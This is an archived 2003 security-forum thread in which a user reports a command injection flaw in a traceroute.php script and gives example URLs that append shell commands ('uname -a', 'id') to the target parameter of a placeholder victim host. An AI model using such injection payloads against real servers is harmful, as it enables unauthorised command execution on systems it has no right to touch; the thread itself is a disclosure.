hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
agopsi
Sep 3 2003, 01:47 PM
Hello this is my first post;).
There's a vulnerability in traceroute.php .it allows you to execute commands on the server with user that apache was started with.
example:
www.victim.com/service/traceroute.php?target=%26uname+-a
or
www.victim.com/service/traceroute.php?target=%26id.


agopsi
woutiir
Sep 3 2003, 05:46 PM
how old is this bug?

anyways, welcome a board, we all hope you enjoy your stay and contribute, as you do now, as mutch as we can like we all do!

Nice share mate, keep 'm coming!

woutiir
agopsi
Sep 3 2003, 09:04 PM
Thank you;)))
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.